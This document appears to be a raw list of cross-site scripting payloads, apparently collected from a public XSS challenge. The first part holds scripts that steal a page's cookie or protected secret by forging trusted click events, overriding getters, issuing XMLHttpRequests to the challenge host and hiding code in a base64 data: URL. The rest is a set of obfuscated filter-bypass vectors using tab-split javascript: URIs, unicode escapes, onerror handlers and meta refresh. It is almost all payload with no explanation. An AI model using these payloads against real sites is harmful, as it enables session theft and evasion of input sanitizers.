var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); };
document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true});
var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test);
(function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123'));
function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true}));
#
function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } #
MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);#
var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; #
%23
getElementById('safe123').click()
var+x+=+showModelessDialog+(this); alert(x.document.cookie);
location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4=';
r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22>
r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22>
r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22>
r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22>
var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();#
'%2Blocation.hash.substr(1)%2B'')%22>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])
'%2Blocation.hash.substr(1)%2B'')%22>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])
function x(window) { eval(location.hash.substr(1)) }#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
alert(1)')%22 autofocus>
function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
`>
DIV
X
?
?
On Mouse Over?
Click Here
<%
X
http://www.alert(1) ?
alert(1)
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>?
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')
+-+-1-+-+alert(1)
/*<script* */alert(1)//
confirm(1);
alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert(1) style="x:">
<--`![]()
--!>
?